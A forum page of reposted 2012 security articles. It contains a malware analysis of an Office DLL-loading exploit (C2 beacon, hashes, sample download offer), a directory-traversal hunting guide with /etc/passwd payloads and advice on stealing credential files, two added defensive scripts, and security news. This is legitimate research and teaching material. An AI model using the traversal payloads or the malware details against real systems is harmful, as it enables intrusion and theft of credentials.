Everything posted by Nytro

  1. Feb 9 CVE-2011-1980 MSOffice DLL Loading vulnerability + Trojan Nflog
     Wednesday, February 15, 2012

     On February 9, 2012 Symantec disclosed that the previously patched MS Office insecure library loading vulnerability was exploited in the wild. DLL loading vulnerabilities were used in targeted attacks with at least two other exploits in 2011, and they did not reach epidemic proportions like it happened with CVE-2010-3333 RTF or some of the Adobe PDF exploits. I refer to Contagio: Sept. 23 CVE-2011-1991 type (1) deskpan.dll Windows components DLL loading vulnerability and Contagio: Apr 13 CVE-2011-2100 PDF - Adobe DLL Loading Vulnerability - Agenda.7z. DLL search order hijacking exploits had and will have many new reincarnations because of the DLL loading preference order: the Current Working Directory is preferred for most DLL files. You can read more about the root of these problems (not necessarily related to MS Office, but in general) in M-unition: DLL Search Order Hijacking Revisited by Nick Harbour. As described in the Symantec article, fputlsat.dll must be present in the same directory as the Word document in order to be activated by the ActiveX control embedded in the Word document. The payload of this sample is the backdoor trojan Nflog.
     Common Vulnerabilities and Exposures (CVE) number
     CVE-2011-1980: Untrusted search path vulnerability in Microsoft Office 2003 SP3 and 2007 SP2 allows local users to gain privileges via a Trojan horse DLL in the current working directory, as demonstrated by a directory that contains a .doc, .ppt, or .xls file, aka "Office Component Insecure Library Loading Vulnerability."
     Microsoft Security Bulletin MS11-073 - Important: Vulnerabilities in Microsoft Office Could Allow Remote Code Execution (2587634)
     Symantec: New Targeted Attack Using Office Exploit Found In The Wild by Joji Hamada

     General File Information
     File: 275c5ac2067d17187a71b94ccfdc4608.doc  Size: 22016  MD5: 275C5AC2067D17187A71B94CCFDC4608
     File: fputlsat.dll  Size: 126976  MD5: 60068812B59E58D6338AAEBD649F9020

     Download
     Download as a password protected archive (email me if you need the password)

     File Description
     File: 275c5ac2067d17187a71b94ccfdc4608.doc  Size: 22016  MD5: 275C5AC2067D17187A71B94CCFDC4608
     [Figure: Before the document is opened - the DLL file is present in the same directory]
     The Word document has an embedded macro - an ActiveX List View Form Control, a very common ActiveX control, which calls fputlsat.dll "Microsoft Office FrontPage Client Utility Library". There is nothing unusual about this behavior; you can read more about this particular control here, "Using the ListView ActiveX Control", and it is normal for it to call FrontPage libraries. The vulnerability presents itself in the fact that a DLL located in the same folder as the Word document will be used before the legitimate DLL in C:\Program Files\Microsoft Office\Office\.. or other directories.
     [Figure: After the document is opened. DLL file is renamed to Thumbs.db]
     [Figure: Activity after the exploit launch]
     Examination of the ActiveX component shows the original path of the macro/control as it existed on the author's computer: C:\Documents and Settings\Bandit\Local Settings\Temp\Word8.0\FPDTC.DLL (nice user name). Office 8.0 is Office 97 (yes, eons ago) and FPDTC.DLL is a FrontPage Design Time Control that was used around 2000-2001. Considering this, I wonder if this vulnerability not only existed but also was used with minor tweaks through all versions of MS Office - starting with Office 97 and ending with Office 2010, when we finally found it out. Perhaps Microsoft Office/VB gurus will be able to answer and/or correct me.
     [Figure: List view control]
     Upon launch, the user is presented with a choice to Run or not to run ActiveX controls. By that time the exploit has already worked and the files were dropped/renamed. Answering Yes will allow the dropped payload iede32.ocx to run.
     [Figure: ActiveX prompt]
     The picture below shows locations of the dropped file and the registry changes.
     [Figure: SVCHOST.EXE process injection]

     File: fputlsat.dll  Size: 126976  MD5: 60068812B59E58D6338AAEBD649F9020
     fputlsat.dll (thumbs.db) strings
     Unicode Strings:
       Adobe Photoshop ---- ???
       Adobe Photoshop 6.0 ----- ?
     Unknown if these artifacts mean anything. Photoshop is just as old. Maybe the same DLL code was used for other products.
     VS_VERSION_INFO / StringFileInfo 040404b0
       Comments:
       CompanyName: Microsoft Corporation
       FileDescription: Microsoft Office FrontPage Client Utility Library
       FileVersion: 11.0.5510.0
       InternalName: FP40CUTL
       LegalCopyright: Copyright© Microsoft Corporation 2003. All rights reserved.
       LegalTrademarks:
       OriginalFilename: FP40CUTL
       PrivateBuild:
       ProductName: FP40CUTL.DLL -- FrontPage 2000 file. Wonder if Word 2000 was affected too.
       ProductVersion: 11, 0, 0, 0
       SpecialBuild:
       VarFileInfo: Translation

     Created Files
     File: iede32.ocx  Size: 13824  MD5: D4859FC951652B3C9657F8621D4DB625 (Virustotal)
     The trojan starts its activity with POST /NfLog/Nfile.asp. This trojan is not new; for example, there were zero-day CVE-2011-2462 files carrying the same trojan.
     The service modified is irmon (frequently abused by these types of attacks - here is a ThreatExpert report of a very common APT backdoor using the same service).
     List of strings // Created : 14.02.2012 08:00 // Type : Name List
     Key Name: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Irmon\Parameters
     Class Name: <NO CLASS>
     Last Write Time: 2/14/2012 - 1:40 AM
     Value 0
       Name: ServiceDll
       Type: REG_EXPAND_SZ
       Data: C:\WINDOWS\system32\iede32.ocx

     Traffic
     In my case, CC was not active or at least I didn't receive any traffic, but you can see the initial POST and the domain name.

     POST /IElog/TestURL.asp HTTP/1.0
     User-Agent: www
     Host: www.aviraco.com
     Content-Length: 10
     Pragma: no-cache

     1234567890

     HTTP/1.1 400 Bad Request
     Content-Type: text/html
     Date: Tue, 14 Feb 2012 05:39:57 GMT
     Connection: close
     Content-Length: 39

     <h1>Bad Request (Invalid Hostname)</h1>

     Domain Name: aviraco.com
     PunnyCode: aviraco.com
     Creation Date: 2011-03-30 10:31:10
     Updated Date: 2011-03-30 10:31:10
     Expiration Date: 2012-03-30 10:31:10
     Registrant:
       Organization: zhipengwang
       Name: zhipengwang
       Address: Zhongguancun Hailong Building, Room 1005
       City: haidianqu
       Province/State: beijingshi
       Country: china
       Postal Code: 100083
     216.83.63.147 - Host reachable, 408 ms. average
     216.83.32.0 - 216.83.63.255: Ethr.Net LLC, 7960B Soquel Dr. #417, Aptos CA 95003, United States

     IP Address History
     Event Date   Action          Pre-Action IP    Post-Action IP
     2009-12-28   New             -none-           174.37.172.68
     2010-09-13   Change          174.37.172.68    67.228.81.181
     2010-09-24   Change          67.228.81.181    174.37.172.68
     2011-02-02   Change          174.37.172.68    67.228.81.180
     2011-02-13   Not Resolvable  67.228.81.180    -none-
     2011-10-14   New             -none-           98.126.113.28
     2011-10-25   Change          98.126.113.28    216.83.63.14

     Registrar History
     Date         Registrar
     2009-12-26   Name.com aka DomainSite
     2011-03-29   Xin Net

     Name Server History
     Event Date   Action    Pre-Action Server  Post-Action Server
     2009-12-28   New       -none-             Name.com
     2011-02-08   Delete    Name.com           -none-
     2011-03-31   New       Xinnet.cn          Xinnetdns.com
     2011-12-13   Transfer  Xinnetdns.com      Xincache.com

     RR
     www.comedns.com.   A  216.83.63.147
     www.creamofa.com.  A  216.83.63.147

     Automated Scans
     Virustotal: report.doc (MS Word Document), 21.5 KB (22016 bytes). SHA256: 429f206f2c68014c75f8a6ae09e68dd672401e461dd2fa72b9087bb5ee530d1e, SHA1: 7dbf130964cdc0110fd517a5d98188df3d56e850, MD5: 275c5ac2067d17187a71b94ccfdc4608. Detection ratio: 17 / 43. Analysis date: 2012-02-15 04:10:05 UTC.
     Virustotal: fputlsat.dll (Win32 DLL), 124.0 KB (126976 bytes). SHA256: 48bc6c0df3302f7eaa6061c4f3b0357b4c512d5bd6f6088abc6fc274f2efc5aa, SHA1: 8f86b7fcaf0c1ee9b795fa8e559def47ef468128, MD5: 60068812b59e58d6338aaebd649f9020. Detection ratio: 28 / 43. Analysis date: 2012-02-15 04:10:02 UTC.
     Virustotal: iede32.ocx (Win32 DLL), 13.5 KB (13824 bytes). SHA256: 27c87e7993c5661dd3b65e51df5884519fc0234bf36de72082644fa909ccb793, SHA1: d0c3e34bd97c4aa56fe9f176954d274595926a32, MD5: d4859fc951652b3c9657f8621d4db625. Detection ratio: 28 / 42. Analysis date: 2012-02-14 04:13:46 UTC.
     Source: contagio: Feb 9 CVE-2011-1980 MSOffice DLL Loading vulnerability + Trojan Nflog
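The two on-disk artifacts the write-up above describes (a PE image planted beside an Office document and later renamed to Thumbs.db, and the Irmon ServiceDll repointed to a dropped .ocx) can be hunted for with a short triage script. This is an added example, not code from the Contagio post; the hijack-name list and the expected Irmon ServiceDll path are this example's own assumptions, and the sample directory it scans is constructed inline.

```python
import os
import tempfile

# Office document extensions that Word/Excel/PowerPoint open from an arbitrary
# directory, which then becomes the DLL search origin described in the post.
OFFICE_EXTS = {".doc", ".dot", ".xls", ".xlt", ".ppt", ".pps"}

# Library names used in this case and in the two 2011 cases the post cites.
# Assumption: not exhaustive; add whatever your Office build probes for.
KNOWN_HIJACK_NAMES = {"fputlsat.dll", "fpdtc.dll", "deskpan.dll"}

# Extensions where a PE header is expected and therefore not suspicious by itself.
PE_EXTS = {".dll", ".exe", ".ocx", ".sys", ".cpl"}

# Assumption: legitimate ServiceDll for the Irmon (Infrared Monitor) service as it
# ships in System32 on Windows XP. Extend with other svchost-hosted services.
EXPECTED_SERVICEDLL = {"irmon": r"%SystemRoot%\System32\irmon.dll"}


def is_pe_image(path):
    """True if the file begins with the MZ signature, whatever its name says."""
    try:
        with open(path, "rb") as fh:
            return fh.read(2) == b"MZ"
    except OSError:
        return False


def find_dll_planting(root):
    """Walk `root`. In every directory that holds an Office document, flag
    (a) files named like a known hijack target and (b) PE images hiding behind
    a non-executable name such as Thumbs.db. Returns sorted
    (directory, file name, reason) tuples."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        if not any(os.path.splitext(f)[1].lower() in OFFICE_EXTS for f in files):
            continue
        for f in files:
            ext = os.path.splitext(f)[1].lower()
            if f.lower() in KNOWN_HIJACK_NAMES:
                findings.append((dirpath, f, "known hijack DLL name beside Office document"))
            elif ext not in PE_EXTS and is_pe_image(os.path.join(dirpath, f)):
                findings.append((dirpath, f, "PE image with non-executable name"))
    return sorted(findings)


def check_service_dll(service, servicedll_value):
    """Compare a ServiceDll value exported from
    HKLM\\SYSTEM\\CurrentControlSet\\Services\\<service>\\Parameters with the
    expected path. Returns None when it matches, otherwise a reason string."""
    expected = EXPECTED_SERVICEDLL.get(service.lower())
    if expected is None:
        return None  # no baseline for this service
    if servicedll_value.strip().lower() == expected.lower():
        return None
    return "%s ServiceDll repointed to %s (expected %s)" % (service, servicedll_value, expected)


def build_sample_tree():
    """Constructed sample: a decoy report.doc next to a renamed DLL, plus the
    same bytes in a directory that holds no document (ignored by the scan)."""
    root = tempfile.mkdtemp(prefix="dll_hunt_")
    with open(os.path.join(root, "report.doc"), "wb") as fh:
        fh.write(b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 24)  # OLE2 magic only
    with open(os.path.join(root, "Thumbs.db"), "wb") as fh:
        fh.write(b"MZ" + b"\x90" * 62)  # MZ stub only, carries no code
    quiet = os.path.join(root, "pictures")
    os.mkdir(quiet)
    with open(os.path.join(quiet, "Thumbs.db"), "wb") as fh:
        fh.write(b"MZ" + b"\x90" * 62)  # no Office document here, so not reported
    return root


if __name__ == "__main__":
    sample = build_sample_tree()
    for directory, name, reason in find_dll_planting(sample):
        print(directory, name, reason)
    print(check_service_dll("Irmon", r"C:\WINDOWS\system32\iede32.ocx"))
```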
  2. Hunting & Exploiting Directory Traversal
     Friday, February 17, 2012

     In cktricky's last post he provided a great outline on the ins and outs of leveraging Burp's built-in support for directory traversal testing. There are two questions, however, that should immediately come to mind once you are familiar with this tool: How do I find directory traversal, and what should I look for if I do?

     Finding directory traversal is the hunt for dynamic file retrieval or modification. The antonym, static file retrieval, is when the browser is delegated the request for a file on the server. In other words, every <a href>, CSS call for a file/location, and even most JavaScript calls can be considered static. You could copy the path of those requests into the browser address bar and grab the file yourself, because that is pretty much what the browser is doing for you. Dynamic file retrieval, however, is when you request a server-based page/function which serves you a file. Think of it as the difference between calling someone directly on the phone vs. calling an operator who calls that person and patches you in.

     Dynamic file serving takes place for a variety of reasons, such as: user content download locations, dynamic image rendering/resizing features, template engines, language parameters*, AJAX-to-services type calls, sometimes in cookies, and occasionally it is how pages themselves get served. These all basically look something like:

         somefunction.php?img=/some/place/graphic.jpg

     or

         somefunction.php?page=/view/something

     The path to the file can either be relative (../../../etc) or in some rarer cases absolute (c:/windows/boot.ini). Additionally, these requests might be base64 or ROT13 encoded or sometimes encrypted. Neither is a show-stopper.

     You might think language parameters are an odd location for directory traversal, but after talking with my co-workers*, they reminded me about dynamic file modification. Some frameworks use parameters (such as language) to prefix a directory to the request or alter the file name for the appropriate language. Ergo:

         cookie: language=en-us;

     could turn into:

         File.Open('/' + language + '/' + some-file);
         File.Open('/' + language + '.' + some-file);

     If that is true, you can alter the root of a request, then use terminators to kill off the rest of what gets appended (null chars ftw) such as:

         cookie: language=../../../../../etc/passwd
         cookie: language=../../../../../etc/passwd;

     Language, template/skin name, or occasionally environment type variables (such as location=PROD, DEBUG, etc...). Anything that might be prefixed to a file name or directory to search is fair game for that.

     Now what? Once you've identified a location which appears to be ripe for testing, how do you verify and what would you do? To verify, I have found two approaches that work well: default files & known files.

     The first approach is based on looking for default files on the file system. Since you are mostly blind to what exists on a server, you look for the existence of these defaults to see if they can be retrieved. There are two resources which I've found helpful. The first is Mubix's list of post-exploitation commands. In addition to a helpful list of commands for post-exploit, the list includes very common files you might want to look for and steal (by operating system). The second resource is the Apache default layout per OS. This can be really useful if you are attacking a system using Apache, to grab known configurations. For non-Apache web servers, I usually install them locally and see what the default layout looks like manually.

     The second approach comes into play if the first fails (and it might) because the user context of the site doesn't have the authority to access those files. So you have to request files you can be reasonably sure it has access to: the web pages it already serves. In this approach you attempt to serve other parts of the web page, relative to the location you are currently looking at. As a contrived example, say you see a layout something like:

         /mainpage.asp
         /vulnerableFeature.asp?path=/images/some-image.jpg

     you'd test for:

         /vulnerableFeature.asp?path=../mainpage.asp
         /vulnerableFeature.asp?path=/mainpage.asp

     Since you know that the user context of the site has the authority to serve those pages, it -should- be a fairly practical way to verify if your directory traversal is working. You may even get back source code this way.

     If you are attempting to take over the server, you should be looking to steal resources which would help you with that (such as the passwd & SAM files). If you are attempting to do an involuntary code review, you should steal the source code from the pages you are looking at. There are occasionally hard-coded credentials in source, but application configuration files are often gold for credentials. I've found database, admin user, SMTP credentials and FTP users this way.

     Some final things to consider:
       • Most operating systems support the use of environment variables/shortcuts for locations such as %home% or ~. This is useful to remember if there are protections against using a period or two successive periods.
       • When dynamic features serve files, they often violate other protections. In IIS for instance various extensions cannot be served by the server (.config files for instance). However, in most directory traversals you can pull the web.config file out w/o many problems.
       • User-controlled uploads often get served dynamically because there isn't a way for the server to know beforehand what the files are. You can sometimes find directory traversal here by uploading files with weird paths in their names (or renaming them after upload).
       • Developers sometimes leave clues to files' physical locations in comments. I once downloaded the source for an entire site because of this.
       • Image / gallery plugins for CMSs are notorious for directory traversal.
       • Error messages are your friend here. If you get a system/application error instead of a file-not-found type error, you can at least use the mechanism to check for the existence of files.

     Happy Hunting.
     -kuzushi

     * Thanks DC & AJ

     Posted by kuzushi at 2:01 PM
     Source: Carnal0wnage & Attack Research Blog: Hunting & Exploiting Directory Traversal
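The defensive counterpart to the language-prefix pattern discussed in the post above: a resolver that builds `'/' + language + '/' + some-file` under a content root and refuses anything that escapes it, including the `../` chains, drive-letter paths, percent-encoded dots and null terminators the post mentions. This is an added example, not code from the original post; `ALLOWED_LANGUAGES`, the function names and the temporary content tree are this example's own assumptions.

```python
import os
import tempfile
from urllib.parse import unquote

# Assumption: the locales the application actually ships. The allow-list is the
# primary control; the path containment check below is defence in depth.
ALLOWED_LANGUAGES = {"en-us", "de-de", "ro-ro"}


class TraversalError(ValueError):
    """Raised when a user-supplied component would leave the content root."""


def resolve_under_root(root, *parts):
    """Join user-supplied `parts` under `root` and return the resolved path,
    or raise TraversalError if the result lies outside `root`. Handles '../'
    chains, absolute and drive-letter paths, percent-encoded dots and
    embedded NULs (the terminator trick from the post)."""
    root_real = os.path.realpath(root)
    cleaned = []
    for part in parts:
        part = unquote(str(part))  # one decoding pass, so %2e%2e becomes ..
        if "\x00" in part:
            raise TraversalError("NUL byte in path component")
        part = part.replace("\\", "/").strip("/")  # neutralise leading / and \
        if ":" in part:  # c:/windows/boot.ini style absolute paths
            raise TraversalError("drive-qualified path rejected")
        cleaned.append(part)
    candidate = os.path.realpath(os.path.join(root_real, *cleaned))
    # realpath has collapsed every '..' and followed symlinks; all that is left
    # is to confirm the result still lives below the root.
    if os.path.commonpath([root_real, candidate]) != root_real:
        raise TraversalError("path escapes content root: %r" % candidate)
    return candidate


def open_localized(root, language, name):
    """The File.Open('/' + language + '/' + some-file) pattern, done safely."""
    if language not in ALLOWED_LANGUAGES:
        raise TraversalError("unknown language %r" % language)
    with open(resolve_under_root(root, language, name), "r", encoding="utf-8") as fh:
        return fh.read()


def probe(root, language, name):
    """Exercise only the containment check: resolved file name, or 'blocked'."""
    try:
        return os.path.basename(resolve_under_root(root, language, name))
    except TraversalError:
        return "blocked"


def build_content_root():
    """Constructed layout: <tmp>/secret.txt sits one level above the content
    root <tmp>/www, which holds only en-us/strings.txt."""
    base = tempfile.mkdtemp(prefix="traversal_demo_")
    root = os.path.join(base, "www")
    os.makedirs(os.path.join(root, "en-us"))
    with open(os.path.join(root, "en-us", "strings.txt"), "w", encoding="utf-8") as fh:
        fh.write("hello")
    with open(os.path.join(base, "secret.txt"), "w", encoding="utf-8") as fh:
        fh.write("must never be served")
    return root


if __name__ == "__main__":
    www = build_content_root()
    print(open_localized(www, "en-us", "strings.txt"))
    for lang in ("..", "%2e%2e", "../../../../../etc/passwd", "en-us\x00", "c:/windows"):
        print(repr(lang), "->", probe(www, lang, "secret.txt"))
```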
  3. Ubuntu 12.04 LTS Gets HUD Interface
     February 17th, 2012, 22:39 GMT · By Marius Nestor

     [Figure: The HUD feature in Ubuntu 12.04 LTS]
     With today's updates, the upcoming Ubuntu 12.04 LTS (Precise Pangolin) operating system received many new features and improvements, including the Privacy Settings, Video Lens for Unity and the HUD (Head-Up Display) system described in this article. Originally introduced by Mark Shuttleworth last month, the Head-Up Display, or HUD for short, is some sort of add-on for the Unity interface allowing users to interact with applications' menus by pressing the ALT key. At the moment, HUD was introduced alongside the current menus placed on the Unity Panel, but in the end, the Head-Up Display system will entirely replace menus in Unity applications. However, this will most probably happen in Ubuntu 12.10. HUD was developed by Canonical in-house during the last 18 months and, believe it or not, it is here to revolutionize the Linux desktop.
     Source: Ubuntu 12.04 LTS Gets HUD Interface - Softpedia
  4. Trend Micro Releases HijackThis Source Code to sourceforge.net
     Program's Creator Merijn Bellekom Endorses Open Source Move
     By Trend Micro Incorporated. Published: Friday, Feb. 17, 2012 - 8:12 am

     CUPERTINO, Calif., Feb. 17, 2012 -- /PRNewswire/ -- Trend Micro Incorporated (TYO: 4704; TSE: 4704), a global cloud security leader, today announced the release of HijackThis as an open source application. HijackThis (HijackThis - Wikipedia, the free encyclopedia) scans your computer to find settings changed by spyware, malware or other unwanted programs. HijackThis also generates an in-depth report to enable expert users to analyze and fix an infected computer. Several security communities use HijackThis log files to help users evaluate and eradicate infections. A common practice for novice users is to generate a HijackThis log file and submit it to one of the many forums devoted to HijackThis on the web. Experts at these forums provide information on which items are causing your problems and how to remove them safely from your computer. The code, originally written in Visual Basic, is now officially available at HiJackThis | Free software downloads at SourceForge.net.

     "This means that other people can build on a solid base to create or improve their own anti-malware tools," said Merijn Bellekom, the original creator of HijackThis. Trend Micro has offered HijackThis as a free tool since acquiring the antispyware freeware tool from its Netherlands-based creator, Merijn Bellekom, in 2007. By then, it had already been downloaded more than 10 million times and was often used to submit logs to online discussion and help forums, such as Castlecops.com, Majorgeeks.com and Spywareinfo.com, to elicit comments that could help in cleaning infected desktops.

     "HijackThis was an essential tool at CastleCops, so much so that there were forums, web applications and services dedicated to it, answering questions posed from the data collected about files and registry entries. Hands down, HijackThis was vital to the health of a PC, providing needed data that helped experts clean machines from complicated malware infections. Enabling the open source community with source code for the powerful tool HijackThis shows the commitment Trend Micro has toward advancing security and privacy. The OSS framework provides people with an opportunity to help others in a rich and diverse environment, and this ensures that HijackThis will continue building on its strength in serving the community," said Paul Laudanski, Founder, Castlecops.com.

     Trend Micro will continue to maintain the original source code and will update the base code on SourceForge as developers make modifications that are essential and positive to the continued improvement of this code. As new malicious code is released faster than ever before, the need for analyzing log data to identify new malicious code is more important than ever. Through this offer to the open source community, the product has the opportunity to develop and become an even better solution to quickly identify new malicious code.

     "HijackThis moving to open source is a really exciting stage for this tool and a big thanks to Trend Micro for bringing this tool back to life. HijackThis was once the most used tool for enumerating Windows startup programs and quickly identifying the presence of malware. Moving HijackThis to open source will prompt more rapid releases and also allow more people to be involved in the project so that it is able to keep pace with current infection techniques," said Larry Abrams, Owner and Founder of BleepingComputer.com.

     About Trend Micro
     Trend Micro Incorporated (TYO: 4704; TSE: 4704), a global cloud security leader, creates a world safe for exchanging digital information with its Internet content security and threat management solutions for businesses and consumers. A pioneer in server security with over 20 years' experience, we deliver top-ranked client, server and cloud-based security that fits our customers' and partners' needs, stops new threats faster, and protects data in physical, virtualized and cloud environments. Powered by the industry-leading Trend Micro Smart Protection Network cloud computing security infrastructure, our products and services stop threats where they emerge: from the Internet. They are supported by 1,000+ threat intelligence experts around the globe. Additional information about Trend Micro Incorporated and its products and services is available at Trend Micro.com. This Trend Micro news release and other announcements are available at http://NewsRoom.TrendMicro.com and as part of an RSS feed at www.trendmicro.com/rss. Or follow our news on Twitter at @TrendMicro.

     SOURCE Trend Micro Incorporated
     Source: Trend Micro Releases HijackThis Source Code to sourceforge.net - PR Newswire - sacbee.com
  5. [h=1]Google Chrome update fixes high-severity vulnerabilities and patches Flash Player[/h]by Lucian Constantin, IDG News Service Feb 16, 2012 11:00 pm Google released a new version of its Chrome browser on Wednesday in order to update the bundled Flash Player plug-in and address serious security vulnerabilities. Google Chrome 17.0.963.56 fixes 12 security flaws, seven of which are considered high severity, four of medium severity and one of low severity. Security researcher Jüri Aedla received a special $1,337 reward for discovering and reporting an integer overflow vulnerability in libpng, the library used by Chrome to process PNG images. Other high-severity flaws were identified in the browser's PDF codecs, its subframe loading, h.264 parsing and path rendering components, as well as its MKV, database, column and counter node handling code. In theory these vulnerabilities should be considered critical because they could facilitate the remote execution of arbitrary code on the targeted systems. However, because Google Chrome has a sandboxed architecture, exploiting these vulnerabilities alone would not provide attackers with the necessary level of access to run malicious code. Six vulnerabilities patched in this release were discovered with the help of an open-source tool called AddressSanitizer, Google Chrome engineer Jason Kersey said in a blog post on Wednesday. Chrome 17.0.963.56 also includes a new Flash Player version that Adobe released on Wednesday, Kersey said. The Flash Player update addresses seven critical security flaws. Google paid a total of $6,837 to security researchers who reported vulnerabilities patched in this release. The company recently expanded its Chromium Security Rewards Program to also cover vulnerabilities found in Chrome OS. Sursa: Google Chrome update fixes high-severity vulnerabilities and patches Flash Player | Macworld
  6. [h=3]Tales from the DNSCrypt: Linux Rising[/h] by David Ulevitch, Founder/CEO on Feb 16th, 2012 When we released the Mac-only preview of DNSCrypt, we knew it was a game changer. The revolutionary piece of lightweight software encrypts all DNS traffic between you and our servers. We also knew it was our responsibility to get this fundamental improvement to Internet security ready for the masses as quickly as possible. That's why last week we announced that we're searching for a rockstar win32 hacker to build a Windows release. But the blog post catalyzed a frenzy of responses from Linux users asking when a version would be available for them. The good news is that the wait is over for Linux users. In fact, there was never a wait at all. We published the code for DNSCrypt on GitHub when we released the preview, so although there isn't a user interface built just yet, Linux users can still experience the benefits of DNSCrypt in just a few steps. Here are simple step-by-step instructions for setting up DNSCrypt on your Linux machine:
1. Download the right package for your Linux distribution: 64-bit DEB package (Debian, Ubuntu, other .deb-based distributions), 32-bit DEB package, 64-bit RPM package (Openwall, CentOS, Fedora, other .rpm-based distributions) or 32-bit RPM package.
2. Install the package using your package manager.
3. Open a terminal and enter: sudo /usr/sbin/dnscrypt-proxy --daemonize
4. Set your DNS settings to 127.0.0.1. Confirm you're using OpenDNS here.
Now that you're using DNSCrypt, you can spread the word to other Linux users. We'd love to see your blog posts, videos and social media posts so don't forget to tag @OpenDNS on Facebook and Twitter. If you want to help build a GUI to make this process even easier for Linux users, we'd be happy to work with you to get it right. If you'd like us to review your work, email us at dnscrypt at opendns dot com. Additional instructions and compilation instructions for other operating systems can be found here.
Sursa: https://blog.opendns.com/2012/02/16/tales-from-the-dnscrypt-linux-rising/
  7. [h=1]Google cookies 'bypassed Safari privacy protection'[/h] 17 February 2012 Last updated at 18:28 GMT Google has been accused of bypassing the privacy settings of users of the Safari web-browser. The Wall Street Journal said Google and other companies had worked around privacy settings designed to restrict cookies. Cookies are small text files stored by browsers which can record information about online activity, and help some online services work. However Google says the story "mischaracterises" what happened. Advertisers can use cookies to track online behaviour, helping them to target the commercials they show to internet users. Some think this use of cookies erodes online privacy. In May, European Union laws are due to come into force which will restrict the use of advertising cookies. But cookies are also essential to some web services like those Google offers. Cookie control The Safari browser is produced by Apple, and is the browser used by the iPhone. By default Safari only allows cookies to be stored by the web page a user is visiting, not from third parties such as advertisers. However, Stanford University researcher Jonathan Mayer found that advertisers were still able to store cookies on the computers of internet users browsing with Safari. It was his discovery that formed the basis of the Wall Street Journal's story. Many Google services use cookies, for example to remember when someone is signed in to a service, but they are also used by the firm to help personalise advertising. It was when Google attempted to find a way to enable some of its services and personalised advertising to work on Safari that, Google says, it inadvertently stored cookies. Side-stepping Safari In a statement, senior vice president Rachel Whetstone said that last year the company had decided to "enable features for signed-in Google users on Safari who had opted to see personalised ads and other content". 
She added: "To enable these features, we created a temporary communication link between Safari browsers and Google's servers, so that we could ascertain whether Safari users were also signed into Google, and had opted for this type of personalisation." Ms Whetstone said the company had created new systems to make sure the information it collected was *********, but this had led to unintended consequences: "The Safari browser contained functionality that then enabled other Google advertising cookies to be set on the browser. "We didn't anticipate that this would happen, and we have now started removing these advertising cookies from Safari browsers. It's important to stress that, just as on other browsers, these advertising cookies do not collect personal information." The Wall Street Journal reported that Google "disabled the code after being contacted by the paper". Google declined to provide further comment to the BBC. Privacy warning Online privacy advocates were highly critical of Google's actions. The Electronic Frontier Foundation wrote: "It's time for Google to acknowledge that it can do a better job of respecting the privacy of web users." Although much of the criticism has been directed at the search giant, the Wall Street Journal said that in addition to Google, a number of advertising companies had been using the work-around which had been known about for some time. An Apple spokesman said in a statement: "We are aware that some third parties are circumventing Safari's privacy features and we are working to put a stop to it." Sursa: Google Cookies Bypassed Safari Privacy Protection ≈ Packet Storm
  8. [h=1]Computer spyware is newest weapon in Syrian conflict[/h] By Ben Brumfield, CNN, February 17, 2012. Photo caption: Syrians demonstrate against the regime after Friday prayers in the north Syrian city of Idlib on February 17. Activists working against the regime now have to worry about malware that can expose their activities. (CNN) -- In Syria's cyberwar, the regime's supporters have deployed a new weapon against opposition activists -- computer viruses that spy on them, according to an IT specialist from a Syrian opposition group and a former international aid worker whose computer was infected. A U.S.-based antivirus software maker, which analyzed one of the viruses at CNN's request, said that it was recently written for a specific cyberespionage campaign and that it passes information it robs from computers to a server at a government-owned telecommunications company in Syria. Supporters of dictator Bashar al-Assad first steal the identities of opposition activists, then impersonate them in online chats, said software engineer Dlshad Othman. They gain the trust of other users, pass out Trojan horse viruses and encourage people to open them. Once on the victim's computer, the malware sends information out to third parties. Othman is an IT security "go-to-guy" for opposition activists. He resides outside of Syria for his own safety. Since December, he has heard from dozens of opposition members who say their computers were infected. Two of them recently passed actual viruses to Othman and a colleague with whom he works. They checked them out. "We have two malwares -- first one is really complex," Othman said via Skype chat. "It can hide itself more." The U.S. analysis of one of the viruses -- the simpler one -- would appear to corroborate the time of its launch around the start of the year.
The virus has two parts, said Vikram Thakur, principal security response manager at Symantec Corporation, known to consumers for its Norton antivirus software. He said one of them points to December 6 and the other to January 16. Thakur has dubbed the simpler virus "backdoor.breut." It was the more complex virus that the former aid worker unwittingly downloaded during a chat. Since she travels to Syria, she has requested that CNN not name her for security reasons and instead refer to her as "Susan." To get a picture of the humanitarian needs on the ground in Syria, "Susan" contacted opposition members via the Internet. In January, she received a call via Skype from someone she believed was a regime opponent. It was an imposter and a regime supporter, she claims. "They called me actually and pretended that it's him -- this activist that I didn't know, because I'd been talking to him only two times and only in writing." Days later, other opposition members told Susan and Othman that the activist she thought she had spoken with was in detention. Activists accuse government forces of coercing him to reveal his user name and identity and of then going online to impersonate him. Othman says additional activists, who say they were detained and released, tell of being forced to turn over their passwords to Syrian authorities. CNN cannot independently confirm the accusations, because the Syrian government strictly limits international media coverage within its borders. Calls for Syrian government comment to a spokeswoman for al-Assad on Friday were not answered or did not go through. Friday is the weekly special day of prayer in the Muslim world. The man chatting with Susan via Skype passed her a file. She recalled what he said to her to coax her to open it: "This makes sure that when you're talking to me, it's really me talking to you and not somebody else." She clicked on the file.
"It actually didn't do anything," she said in a baffled tone. "I didn't notice any change at all." No graphics launched; no pop-up opened to announce to the user that the virus was being downloaded. The link appeared to be dead or defected, said Othman. The second virus, backdoor.breut, which was e-mailed to him by an activist inside Syria for analysis, launched the same way. "Download, open, then nothing," Othman said. It contains a fake Facebook logo and was passed off in a chat room as a Facebook security update, he said. At CNN's request, Othman forwarded that virus to an IT security expert in California for an independent analysis. Othman removed the more complex malware on Susan's computer but made an image of the infected hard drive beforehand. At more than 250 GB, it would have to be sent on an external hard drive by regular post -- snail mail -- for any independent scrutiny. The U.S. expert confirmed the invisible nature of the backdoor.breut Trojan horse download. "Nothing would actually show up," said Thakur. "The only thing that the Trojan actually does -- it copies itself into one of the temporary locations, but that would not be visible to the regular user." The malware launches when the user reboots the computer. The Syrian cyberactivist and the California IT security manager pointed out that the lack of fanfare during download helps to conceal the viruses from their victims. "Most of them will say 'it's a damaged file,' and they will forget about it," Othman said. Susan did just that. She was not aware she had been hacked until she lost her Facebook and e-mail accounts a few days after clicking on the file. "I didn't click on any kind of new link or something, so they must have known about the password," she said, referring to the loss of her Facebook account.
